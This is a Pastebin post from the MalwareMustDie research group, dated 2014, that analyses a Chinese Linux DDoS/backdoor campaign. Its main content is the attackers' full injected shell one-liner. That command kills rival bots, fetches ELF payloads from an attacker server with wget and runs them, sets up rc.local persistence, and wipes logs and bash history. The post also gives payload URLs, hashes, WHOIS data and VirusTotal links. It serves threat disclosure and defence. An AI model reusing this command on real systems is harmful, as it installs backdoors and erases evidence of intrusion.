Advertisement
MalwareMustDie

Multiple China DDoS-er/backdoor payloads w/long shell cmd

Oct 14th, 2014
5,440
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie!! Tue Oct 14 21:37:28 JST 2014
  2. // Multiple China DDoS-er/backdoor payloads was reported in action infecting victim using
  3. // one-liner long shell command
  4. // Initial case: http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html
  5. // Follow up report: http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html?showComment=1413220693224#c4466937356030505144
  6. // Payloads are: China ELF DDoS-er malware multiple type:
  7.    (1) Linux/IptabLes|x , (2) Linux/BillGates & (3) Linux/Elknot (packed & unpacked)
  8.  
  9. // One line injected command:
  10.  
  11. "/etc/init.d/iptables stop
  12.        echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  13.        echo "nameserver 8.8.4.4" >> /etc/resolv.conf
  14.        apt-get -y install wget
  15.        yum -y install wget
  16.        chmod 7777 / etc
  17.        killall -9 .IptabLes
  18.        killall -9 nfsd4
  19.        killall -9 profild.key
  20.        cd /etc;rm -rf dir fake.cfg
  21.        killall -9 nfsd
  22.        killall -9 DDosl
  23.        killall -9 lengchao32
  24.        killall -9 b26
  25.        killall -9 khelper
  26.        killall -9 Bill
  27.        killall -9 n26
  28.        killall -9 007
  29.        killall -9 codelove
  30.        killall -9 32
  31.        killall -9 m32
  32.        killall -9 m64
  33.        killall -9 64
  34.        killall -9 83BOT
  35.        killall -9 82BOT
  36.        killall -9 dos64
  37.        killall -9 dos32
  38.        killall -9 new6
  39.        killall -9 new4
  40.        killall -9 node24
  41.        killall -9 mimi
  42.        killall -9 nodeJR-1
  43.        killall -9 freeBSD
  44.        killall -9 ksapdd
  45.        killall -9 106
  46.        killall -9 09
  47.        killall -9 xsw
  48.        killall -9 syslogd
  49.        killall -9 skysapdd
  50.        killall -9 cupsddd
  51.        killall -9 ksapd
  52.        killall -9 atddd
  53.        killall -9 xfsdxd
  54.        killall -9 sfewfesfs
  55.        killall -9 gfhjrtfyhuf
  56.        killall -9 rewgtf3er4t
  57.        killall -9 fdsfsfvff
  58.        killall -9 smarvtd
  59.        killall -9 whitptabil
  60.        killall -9 gdmorpen
  61.        cd /etc;chattr -i 66
  62.        cd /root; chmod 7777 / etc
  63.        killall -9 minerd
  64.        killall -9 syn
  65.        killall -9 joudckfr
  66.        killall -9 www
  67.        killall -9 log
  68.        killall -9 .IptabLes
  69.        killall -9 .IptabLex
  70.        killall -9 .Mm2
  71.        killall -9 acpid
  72.        killall -9 m64
  73.        killall -9 ./QQ
  74.        killall -9 aabb
  75.        killall -9 g3
  76.        killall -9 S99local
  77.        killall -9 3
  78.        killall -9 pm
  79.        killall -9 qweasd
  80.        killall -9 tangtang
  81.        killall -9 imap-login
  82.        killall -9 xudp
  83.        killall -9 sshpa
  84.        killall -9 008
  85.        killall -9 txma
  86.        killall -9 mrdos64.b00
  87.        killall -9 mrdos32.b00
  88.        killall -9 kkpklp
  89.        killall -9 kiilp
  90.        killall -9 xin1
  91.        killall -9 jibateng
  92.        killall -9 syscore.sh
  93.        killall -9 syscore.sh
  94.        killall -9 syscore.sh
  95.        killall -9 .mimeo
  96.        killall -9 .mimeo
  97.        killall -9 .mimeo
  98.        killall -9 .mimeop
  99.        killall -9 .task1
  100.        killall -9 .mimeop
  101.        killall -9 .IptabLes
  102.        killall -9 .IptabLex
  103.        killall -9 .IptabLes
  104.        killall -9 .IptabLex
  105.        killall -9 .IptabLes
  106.        killall -9 .IptabLex
  107.        killall -9 .IptabLes
  108.        killall -9 .IptabLex
  109.        cd /root;rm -rf dir nohup.out
  110.        cd /etc;rm -rf dir fake.cfg
  111.        cd /etc;rm -rf dir cupsddd.*
  112.        cd /etc;rm -rf dir atddd.*
  113.        cd /etc;rm -rf dir ksapdd.*
  114.        cd /etc;rm -rf dir kysapdd.*
  115.        cd /etc;rm -rf dir sksapdd.*
  116.        cd /etc;rm -rf dir skysapdd.*
  117.        cd /etc;rm -rf dir xfsdxd.*
  118.        cd /etc;rm -rf dir fake.cfg
  119.        cd /etc;rm -rf dir cupsdd.*
  120.        cd /etc;rm -rf dir atdd.*
  121.        cd /etc;rm -rf dir ksapd.*
  122.        cd /etc;rm -rf dir kysapd.*
  123.        cd /etc;rm -rf dir sksapd.*
  124.        cd /etc;rm -rf dir skysapd.*
  125.        cd /etc;rm -rf dir xfsdx.*
  126.        cd /etc;rm -rf dir sfewfesfs
  127.        cd /etc;rm -rf dir gfhjrtfyhuf
  128.        cd /etc;rm -rf dir rewgtf3er4t
  129.        cd /etc;rm -rf dir fdsfsfvff
  130.        cd /etc;rm -rf dir smarvtd
  131.        cd /etc;rm -rf dir whitptabil
  132.        cd /etc;rm -rf dir gdmorpen
  133.        cd /etc;rm -rf dir sfewfesfs.*
  134.        cd /etc;rm -rf dir gfhjrtfyhuf.*
  135.        cd /etc;rm -rf dir rewgtf3er4t.*
  136.        cd /etc;rm -rf dir fdsfsfvff.*
  137.        cd /etc;rm -rf dir smarvtd.*
  138.        cd /etc;rm -rf dir whitptabil.*
  139.        cd /etc;rm -rf dir gdmorpen.*
  140.        cd /etc;rm -rf dir nhgbhhj.*
  141.        cd /tmp;rm -rf dir 1.*
  142.        cd /tmp;rm -rf dir 2.*
  143.        cd /tmp;rm -rf dir 3.*
  144.        cd /tmp;rm -rf dir 4.*
  145.        cd /tmp;rm -rf dir 5.*
  146.        cd /tmp;rm -rf dir jdhe
  147.        cd /tmp;rm -rf dir jdhe.*
  148.        cd /var/spool/cron; rm -rf dir root.*
  149.        cd /var/spool/cron; rm -rf dir root
  150.        cd /var/spool/cron/crontabs; rm -rf dir root.*
  151.        cd /var/spool/cron/crontabs; rm -rf dir root
  152.        cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
  153.        cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
  154.        yes|mv /tmp/root /var/spool/cron
  155.        yes|mv /tmp/root /var/spool/cron/crontabs
  156.        cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
  157.        cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
  158.        cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
  159.        cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
  160.        cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
  161.        cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
  162.        cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
  163.        cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
  164.        cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
  165.        cd /etc;wget -c http://www.frade8c.com:9162/byv832
  166.        cd /tmp;chmod 7777 jdhe
  167.        cd /etc;chmod 7777 nhgbhhj
  168.        cd /etc;chmod 7777 byv832
  169.        cd /etc;chmod 7777 sfewfesfs
  170.        cd /etc;chmod 7777 gfhjrtfyhuf
  171.        cd /etc;chmod 7777 rewgtf3er4t
  172.        cd /etc;chmod 7777 fdsfsfvff
  173.        cd /etc;chmod 7777 smarvtd
  174.        cd /etc;chmod 7777 whitptabil
  175.        cd /etc;chmod 7777 gdmorpen
  176.        cd /tmp;chmod 7777 nhgbhhj
  177.        cd /tmp;chmod 7777 byv832
  178.        cd /tmp;chmod 7777 sfewfesfs
  179.        cd /tmp;chmod 7777 gfhjrtfyhuf
  180.        cd /tmp;chmod 7777 rewgtf3er4t
  181.        cd /tmp;chmod 7777 fdsfsfvff
  182.        cd /tmp;chmod 7777 smarvtd
  183.        cd /tmp;chmod 7777 whitptabil
  184.        cd /tmp;chmod 7777 gdmorpen
  185.        cd /tmp;./jdhe
  186.        nohup /etc/sfewfesfs > /dev/null 2>&1&
  187.        nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
  188.        nohup /etc/rewgtf3er4t > /dev/null 2>&1&
  189.        nohup /etc/fdsfsfvff > /dev/null 2>&1&
  190.        nohup /etc/smarvtd > /dev/null 2>&1&
  191.        nohup /etc/whitptabil > /dev/null 2>&1&
  192.        nohup /etc/gdmorpen > /dev/null 2>&1&
  193.        nohup /etc/nhgbhhj > /dev/null 2>&1&
  194.        nohup /etc/byv832 > /dev/null 2>&1&
  195.        nohup /tmp/sfewfesfs > /dev/null 2>&1&
  196.        nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
  197.        nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
  198.        nohup /tmp/fdsfsfvff > /dev/null 2>&1&
  199.        nohup /tmp/smarvtd > /dev/null 2>&1&
  200.        nohup /tmp/whitptabil > /dev/null 2>&1&
  201.        nohup /tmp/gdmorpen > /dev/null 2>&1&
  202.        nohup /tmp/nhgbhhj > /dev/null 2>&1&
  203.        nohup /tmp/byv832 > /dev/null 2>&1&
  204.        echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
  205.        echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
  206.        echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
  207.        echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
  208.        echo "cd /tmp;./smarvtd" >> /etc/rc.local
  209.        echo "cd /tmp;./whitptabil" >> /etc/rc.local
  210.        echo "cd /tmp;./gdmorpen" >> /etc/rc.local
  211.        echo "cd /etc;./sfewfesfs" >> /etc/rc.local
  212.        echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
  213.        echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
  214.        echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
  215.        echo "cd /etc;./smarvtd" >> /etc/rc.local
  216.        echo "cd /etc;./whitptabil" >> /etc/rc.local
  217.        echo "cd /etc;./gdmorpen" >> /etc/rc.local
  218.        echo "unset MAILCHECK" >> /etc/profile
  219.        cd /etc;chattr +i sfewfesfs
  220.        rm -rf /root/.bash_history
  221.        touch /root/.bash_history
  222.        history -r
  223.        cd /var/log > dmesg
  224.        cd /var/log > auth.log
  225.        cd /var/log > alternatives.log
  226.        cd /var/log > boot.log
  227.        cd /var/log > btmp
  228.        cd /var/log > cron
  229.        cd /var/log > cups
  230.        cd /var/log > daemon.log
  231.        cd /var/log > dpkg.log
  232.        cd /var/log > faillog
  233.        cd /var/log > kern.log
  234.        cd /var/log > lastlog
  235.        cd /var/log > maillog
  236.        cd /var/log > user.log
  237.        cd /var/log > Xorg.x.log
  238.        cd /var/log > anaconda.log
  239.        cd /var/log > yum.log
  240.        cd /var/log > secure
  241.        cd /var/log > wtmp
  242.        cd /var/log > utmp
  243.        cd /var/log > messages
  244.        cd /var/log > spooler
  245.        cd /var/log > sudolog
  246.        cd /var/log > aculog
  247.        cd /var/log > access-log
  248.        cd /root > .bash_history
  249.        history -c"
  250.  
  251.  
  252. // Payload URLS:
  253.  
  254. h00p://www.frade8c.com:9162/root (crontab script garbage)
  255.  
  256. h00p://www.frade8c.com:9162/jdhe
  257. h00p://www.frade8c.com:9162/sfewfesfs
  258. h00p://www.frade8c.com:9162/gfhjrtfyhuf
  259. h00p://www.frade8c.com:9162/rewgtf3er4t
  260. h00p://www.frade8c.com:9162/fdsfsfvff
  261. h00p://www.frade8c.com:9162/smarvtd
  262. h00p://www.frade8c.com:9162/whitptabil
  263. h00p://www.frade8c.com:9162/gdmorpen
  264. h00p://www.frade8c.com:9162/nhgbhhj
  265. h00p://www.frade8c.com:9162/byv832
  266.  
  267. // Source analyzed:
  268.  
  269.  
  270. Date: 2014-10-14 19:57:50
  271. Resolving www.frade8c.com (www.frade8c.com)... 219.135.56.211
  272. Caching www.frade8c.com => 219.135.56.211
  273. Connecting to www.frade8c.com (www.frade8c.com)|219.135.56.211|:9162... connected.
  274. Host: www.frade8c.com:9162
  275. Connection: Keep-Alive
  276. HTTP request sent, awaiting response...
  277.  
  278. ---response---
  279. HTTP/1.1 200 OK
  280. Server: nginx/1.6.2
  281. Date: Tue, 14 Oct 2014 18:58:37 GMT
  282. Content-Type: application/octet-stream
  283. Content-Length: 1554782
  284. Last-Modified: Sun, 24 Aug 2014 18:29:06 GMT
  285. Connection: keep-alive
  286. ETag: "53fa2ef2-17b95e"
  287. Accept-Ranges: bytes
  288. 200 OK
  289. Registered socket 4 for persistent reuse.
  290. Length: 1554782 (1.5M) [application/octet-stream]
  291.  
  292. // Server Location: CHINA
  293. 219.135.56.211|211.56.135.219.broad.fs.gd.dynamic.163data.com.cn.|4134 | 219.128.0.0/13 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET GUANGDONG PROVINCE NETWORK
  294.  
  295. // Domain Registration; CHINA
  296.  
  297.    Domain Name: FRADE8C.COM
  298.    Registrar: GODADDY.COM, LLC
  299.    Whois Server: whois.godaddy.com
  300.    Referral URL: http://registrar.godaddy.com
  301.    Name Server: FREE.QYCN.CN
  302.    Name Server: FREE.QYCN.COM
  303.    Name Server: FREE.QYCN.NET
  304.    Name Server: FREE.QYCN.ORG
  305.    Status: clientDeleteProhibited
  306.    Status: clientRenewProhibited
  307.    Status: clientTransferProhibited
  308.    Status: clientUpdateProhibited
  309.    Updated Date: 10-sep-2014
  310.    Creation Date: 12-may-2014
  311.    Expiration Date: 12-may-2015
  312. >>> Last update of whois database: Tue, 14 Oct 2014 11:48:23 GMT <<<
  313.  
  314. Domain Name: FRADE8C.COM
  315. Registry Domain ID: 1858356025_DOMAIN_COM-VRSN
  316. Registrar WHOIS Server: whois.godaddy.com
  317. Registrar URL: http://www.godaddy.com
  318. Update Date: 2014-05-12 12:05:14
  319. Creation Date: 2014-05-12 11:43:36
  320. Registrar Registration Expiration Date: 2015-05-12 11:43:36
  321. Registrar: GoDaddy.com, LLC
  322. Registrar IANA ID: 146
  323. Registrar Abuse Contact Email: abuse@godaddy.com
  324. Registrar Abuse Contact Phone: +1.480-624-2505
  325. Domain Status: clientTransferProhibited
  326. Domain Status: clientUpdateProhibited
  327. Domain Status: clientRenewProhibited
  328. Domain Status: clientDeleteProhibited
  329. Registry Registrant ID:
  330. Registrant Name: xiao buyu
  331. Registrant Organization:
  332. Registrant Street: shanghaishirenminluyihao
  333. Registrant City: shanghai
  334. Registrant State/Province: shanghai
  335. Registrant Postal Code: 200000
  336. Registrant Country: China
  337. Registrant Phone: +0.862185966589
  338. Registrant Phone Ext:
  339. Registrant Fax:
  340. Registrant Fax Ext:
  341. Registrant Email: zhucegodaddy@126.com
  342. Registry Admin ID:
  343. Last update of WHOIS database: 2014-10-14T11:00:00Z
  344.  
  345.  
  346. // PAYLOAD ANALYSIS RESULT:
  347.  
  348. $ #MalwareMustDie!
  349. $ # Just finished categorized & analized these Chinese Ddoser mess:
  350. $
  351. $ date
  352. Tue Oct 14 20:39:16 JST 2014
  353. $
  354. $ file *
  355. byv832.IptabLes.mmd:           ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
  356. fdsfsfvff.IptabLes.x32.mmd:    ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
  357. gdmorpen.IptabLes.mmd:         ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
  358. gfhjrtfyhuf-unpack.Elknot.mmd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
  359. gfhjrtfyhuf.packed.Elknot.mmd: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
  360. jdhe.BillGates.mmd:            ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, for FreeBSD 8.4, not stripped
  361. nhgbhhj.BillGates.mmd:         ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
  362. rewgtf3er4t.IptabLes.x64.mmd:  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
  363. sfewfesfs.BillGates.mmd:       ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
  364. smarvtd-packed.Elknot.mmd:     ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
  365. smarvtd-unpack.Elknot.mmd:     ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
  366. whitptabil-unpack.Elknot.mmd:  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
  367. whitptabil.pack.Elknot.mmd:    ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
  368. $ md5 *
  369. MD5 (byv832.IptabLes.mmd) =           f7556d9ede5d988400b1edbb1a172634
  370. MD5 (fdsfsfvff.IptabLes.x32.mmd) =    048016c6e6848f92a29296b72df4d2d8
  371. MD5 (gdmorpen.IptabLes.mmd) =         e029dd6a6570c70a2b12301db8b508d1 = smarvtd-packed.Elknot.mmd = whitptabil.pack.Elknot.mmd
  372. MD5 (gfhjrtfyhuf.packed.Elknot.mmd) = 9941a4dc930868a5739a8004de53a686
  373. MD5 (gfhjrtfyhuf-unpack.Elknot.mmd) = 4f446e593dd83a24199ec2e7a84ac86a
  374. MD5 (jdhe.BillGates.mmd) =            7f3445e754493e76e09713cbc6415308
  375. MD5 (nhgbhhj.BillGates.mmd) =         8a9b27ee8ff7475ef535217583e02d8f
  376. MD5 (rewgtf3er4t.IptabLes.x64.mmd) =  18bcb1c192df95a4216946f0294135bf
  377. MD5 (sfewfesfs.BillGates.mmd) =       8285f35183f0341b8dfe425b7348411d
  378. MD5 (smarvtd-unpack.Elknot.mmd) =     fe060c05813fe155273f5b87bb59f960 = whitptabil-unpack.Elknot.mmd
  379.  
  380.  
  381.  
  382. https://www.virustotal.com/en/file/b0329f31923b7c39ddd1f345d12add01fdfeee6000ee03657163f87c7a09a527/analysis/1413287761/
  383. https://www.virustotal.com/en/file/ec4645d8306648a713e2b22849e72ff6eeb3931a83cee352fd105448577e6220/analysis/1413287839/
  384. https://www.virustotal.com/en/file/8f929aa1171de80191788fd78f56173de72048d15914f814f5271f00e6882324/analysis/1413287924/
  385. https://www.virustotal.com/en/file/5dbd1150f20fe8cd84f03484b661b5e822ff43a7e51d6c1d44c426f21cab225b/analysis/1413287986/
  386. https://www.virustotal.com/en/file/90f268827ea8f2543d38d1cb90a2f56da506e2152164984c8eb59b3043b485fc/analysis/1413288124/
  387. https://www.virustotal.com/en/file/e2895e8a671aa0c72ebaf7deabcef0b319b4952145f177749f6caef6293ac637/analysis/1413288173/
  388. https://www.virustotal.com/en/file/60cf05e05231cac5a0f0361f7626785db475f6b8f33bd8c3aaf948c0e1118ad3/analysis/1413288297/
  389. https://www.virustotal.com/en/file/f759be8115df769d493ecad3fb2cac09b36aba098f273c22d39364bd23f3138c/analysis/1413288354/
  390. https://www.virustotal.com/en/file/551b48e425dcf4337ee023ad65a871123d172e43fabbc965252f5a2e69d0bd4a/analysis/1413288439/
  391. https://www.virustotal.com/en/file/8f929aa1171de80191788fd78f56173de72048d15914f814f5271f00e6882324/analysis/1413288528/
  392. https://www.virustotal.com/en/file/3c45adc937187d90b6a350a51d2ff0d285d5609af8872433437761406262aefb/analysis/1413288612/
  393.  
  394. #------
  395. #Your report will be followed properly
  396. #MalwareMustDie!!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement